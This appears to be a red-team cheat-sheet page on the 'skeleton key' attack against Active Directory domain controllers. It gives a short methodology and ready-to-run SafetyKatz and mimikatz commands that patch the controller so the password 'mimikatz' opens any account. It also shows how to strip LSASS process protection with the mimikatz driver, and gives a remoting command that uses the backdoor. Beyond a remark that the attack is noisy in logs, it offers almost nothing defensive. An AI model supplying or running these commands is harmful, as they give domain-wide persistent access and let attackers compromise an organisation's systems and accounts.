# skeleton-key

## Methodology

1. Have domain admin privileges.
2. Patch the domain controller.
3. Use the password `mimikatz` to access any machine with a valid username.

## Binaries

> \[!INFO] Remember to follow the Binaries methodology

## SafetyKatz

**Inject a skeleton key on a domain controller**

```
SafetyKatz.exe '"privilege::debug" "misc::skeleton"' -ComputerName us-dc
```

Now, it is possible to access any machine with a valid username and password as "mimikatz"

```
Enter-PSSession –Computername us-dc –credential us\Administrator
```

**If LSASS is running as a protected service, we can still use Skeleton Key but it needs the mimikatz driver (**[**mimidriv.sys**](https://github.com/ParrotSec/mimikatz/blob/master/x64/mimidrv.sys)**) on disk of the target DC:**

```
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-
```

Note that above would be very noisy in logs - Service creation!